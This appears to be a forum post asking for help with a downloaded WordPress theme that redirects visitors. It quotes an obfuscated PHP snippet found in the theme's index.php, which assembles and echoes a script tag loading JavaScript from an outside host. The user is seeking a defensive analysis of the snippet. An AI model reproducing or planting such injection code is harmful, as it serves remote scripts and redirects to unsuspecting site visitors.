So... I downloaded this wordpress-theme and installed it but its redirecting to a landing page...
Found this code in the index.php
When I remove it, I get
Anyone able to decode this?
Never seen something like that before...
Found this code in the index.php
PHP:
<?php $sdjdf="scr";$oe="ipt";$p32aps_asd="type='";$oaspd03="tex";$ijda="t/ja";$o4="vasc";$fs_3="ript'";$sspc=" ";$annl="/";$ia="<";$ai=">";
$kraj=$ia.$annl.$sdjdf.$oe.$ai;$opa1=$ia.$sdjdf.$oe.$sspc.$p32aps_asd.$oaspd03.$ijda.$o4.$fs_3.$sspc;$p30="sr"; $ccc="c='http://";$dsad="au";$sa3j="to";$ois="-";$osa="im";$dota=".";
$co2="co";$zxdml="m/4ad";$meg="54/s";$geai="ju";$k34d="342'";$st0=$p30.$ccc.$dsad.$sa3j.$ois.$osa;$s2t=$dota.$co2.$zxdml.$meg.$geai.$k34d.$ai;$st0.=$s2t;
echo $opa1.$st0.$kraj; ?>
Parse error: syntax error, unexpected $end in /home/domain/public_html/blog/wp-content/themes/newwptheme/index.php on line 32
Anyone able to decode this?
Never seen something like that before...